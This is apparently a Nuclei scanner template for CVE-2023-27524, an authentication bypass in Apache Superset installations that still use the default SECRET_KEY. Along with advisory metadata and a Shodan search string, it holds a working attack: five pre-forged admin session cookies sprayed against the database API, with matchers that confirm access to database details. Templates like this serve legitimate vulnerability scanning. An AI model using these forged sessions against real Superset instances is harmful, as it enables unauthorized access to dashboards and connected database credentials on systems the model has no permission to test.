id: CVE-2023-27524 info: name: Apache Superset - Authentication Bypass author: DhiyaneshDK,_0xf4n9x_ severity: high description: Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config. reference: - https://github.com/horizon3ai/CVE-2023-27524 - https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/ - https://nvd.nist.gov/vuln/detail/CVE-2023-27524 classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L cvss-score: 8.9 cve-id: CVE-2023-27524 cwe-id: CWE-1188 metadata: max-request: 45 verified: true shodan-query: html:"Apache Superset" tags: cve,cve2023,apache,superset,auth-bypass http: - raw: - | GET /api/v1/database/{{path}} HTTP/1.1 Host: {{Hostname}} Cookie: session={{session}} payloads: path: - '1' - '2' - '3' - '4' - '5' - '6' - '7' - '9' - '10' session: - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.RoFeMf1WLNJXDYslf18x9VGxC0Q' - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.hKV8XXVcD6lWhTIoWs0CjrSRPQQ' - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.xtJXBhmJ0k6_oKs8iGhWJK2BjKs' - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.hRZP41FgqxjaxjJ3WyeIVxyZDng' - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.6GpaUB9IP9OnG3HHon3XcdzHWhI' attack: clusterbomb stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - '"database_name":' - '"configuration_method":' condition: and - type: status status: - 200